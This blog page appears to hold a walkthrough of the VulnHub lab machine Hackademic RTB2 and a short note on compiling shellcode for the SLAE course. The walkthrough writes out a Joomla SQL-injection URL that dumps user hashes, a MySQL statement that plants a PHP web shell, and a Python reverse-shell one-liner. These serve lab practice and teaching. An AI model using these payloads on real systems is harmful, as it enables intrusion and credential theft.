Hackademic RTB2 Walkthrough

   Today I will write a small review about intermediate level challenge Hackademic RTB2. You can download it from awesome vulnhub - https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip

1. Reconnaissance 

As usual I started with netdiscover:

Next step was to scan ports:

2. Enumeration

In reality I spent a bit of time as port 80 did not reveal anything, port 666 was filtered. I used tool called knock-knock (https://github.com/pan0pt1c0n/knock-knock). After running it I saw port 666 as open. I examined source code of the page and it was shown as Joomla. I enumerated target more using metasploit module for Joomla plugins as it is quite often that plugins are vulnerable.

3. Exploitation

I was right: sectionid was vulnerable to SQL injection. As a next step I entered quote to verify whether it was a true:

As a next step I reviewed Joomla documentation to understand in what table user hashes are stored. I did hands-on SQL Injection exploitation instead of using sqlmap. I revealed field that was suitable for data exfiltration, enumerated tables and etc. I used this request to extract information about users:
http://192.168.57.102:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1%20union%20select%201,concat(username,0x20,password)%20from%20jos_users--

This gave me hashes:

I cracked hashes using Joomla_cracker.pl from https://gist.github.com/cobra-tn/2304218. Cracked hashes did not give me any new footpath. So I decided to utilize another SQLi option - retrieve files. By default Joomla configuration file located in web root. I assumed that /var/www was default path. After I retrieved file I tried "root" username and password to login in phpMyAdmin.

I was able to login. Then I spent some time to create limited shell. I used this video as an example: https://worldhack3r.wordpress.com/2013/05/06/upload-shell-in-phpmyadmin/. To tell long story short: I created database and table in MySQL. Then I used INTO OUTFILE MySQL command to create PHP shell in web root:
SELECT "<? system($REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/cmd.php"

Then I used this shell to create connection back to my machine using python.

192.168.57.102:666/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.57.101%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

4. Privilege escalation

After quick enumeration I tried several kernel exploits. Machine was rooted using "RDS socket" exploit - https://www.exploit-db.com/exploits/15285/. I uploaded exploit code using wget to /tmp, compiled with default gcc and got root.

Conclusions

In general machine was not difficult, there were only few tricky moments to overcome:
1. port knocking - understand that it is in use and find ways to bypass
2. use SQL injection not only to dump hashes but also enumerate files on filesystem
3. shell in phpMyAdmin

SLAE compilation problem

   This is a quick note about how I overcame some compilation problems during my SLAE course. Review about the course will be soon. So when I tried to compile shellcode that simple spawn a shell using code that was provided in videos I faced: "Program received signal SIGSEGV, Segmentation fault." I checked everything not once, everything was OK, no stupid typos and stuff like that. So next after some googling I found 2 questions on stackoverflow with similar problem. Problem was that in current systems all .text area are marked read only by default. 

1. First advice was to use -N option while linking: ld -N shellcode.o -o shell (http://stackoverflow.com/questions/13777445/execve-shellcode-writing-segmentation-fault/13777931)

2. Second option is to use gcc with -omagic option: gcc --static -g -Wl,--omagic -o shellc shell.c (http://stackoverflow.com/questions/27581279/make-text-segment-writable-elf)

   Both ways were working as a charm.